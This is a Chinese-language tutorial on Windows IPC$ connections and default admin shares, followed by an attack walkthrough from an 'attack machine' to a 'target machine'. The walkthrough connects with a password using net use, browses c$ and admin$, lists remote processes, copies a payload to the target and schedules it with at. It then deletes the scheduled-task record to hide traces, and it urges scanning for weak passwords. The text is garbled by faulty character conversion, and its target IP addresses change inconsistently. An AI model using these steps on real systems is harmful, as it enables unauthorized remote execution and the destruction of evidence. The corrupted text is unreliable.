一,IPC
IPC(Internet Process Connection)共享命名管道的資源,是為了實作程序間通信而開放的命名管道。IPC可以通過驗證使用者名和密碼獲得相應的權限。
二,ipc$與空連接配接,139,445端口,預設共享的關系
1,ipc$與空連接配接:
不需要使用者名與密碼的ipc$連接配接即為空連接配接,一旦你以某個使用者或管理者的身份登陸(即以特定的使用者名和密碼進行ipc$連接配接),自然就不能叫做空連接配接了.
許多人可能要問了,既然可以空連接配接,那我以後就空連接配接好了,為什麼還要費九牛二虎之力去掃描弱密碼,呵呵,原因前面提到過,當你以空連接配接登陸時,你沒有任何權限(很郁悶吧),而你以使用者或管理者的身份登陸時,你就會有相應的權限(有權限誰不想呀,是以還是老老實實掃吧,不要偷懶喲).
2,ipc$與139,445端口:
ipc$連接配接可以實作遠端登陸及對預設共享的通路;而139端口的開啟表示netbios協定的應用,我們可以通過139,445(win2000)端口實作對共享檔案/列印機的通路,是以一般來講,ipc$連接配接是需要139或445端口來支援的.
3,ipc$與預設共享
預設共享是為了友善管理者遠端管理而預設開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接配接可以實作對這些預設共享的通路(前提是對方沒有關閉這些預設共享)
三,使用
攻擊機:192.168.135.1
目标機:192.168.135.129
建立IPC$連接配接
net use \\192.168.135.129\ipc$ "shy" /user:shy
檢視連接配接是否建立
net use
如果是下圖情況,則有可能是該使用者已經登入了。
因為microsoft windows network 不允許一個使用者使用一個以上使用者名與伺服器或共享資源的多重連接配接.
列出目标機中的檔案
dir \\192.168.138.134\c$
dir \\192.168.138.134\admin$
列出目标機上的程序
tasklist /s 192.168.138.135 /u administrator /p shy
取消建立的連接配接
net use * /del /y
四,getshell
計劃任務getshell
1,使用net time确定目标機時間
net time \\192.168.138.135
2,使用copy将payload複制到目标機中
copy calc.bat \\192.168.138.135\c$
3,使用at定時啟動payload檔案
4,删除使用at建立計劃任務的記錄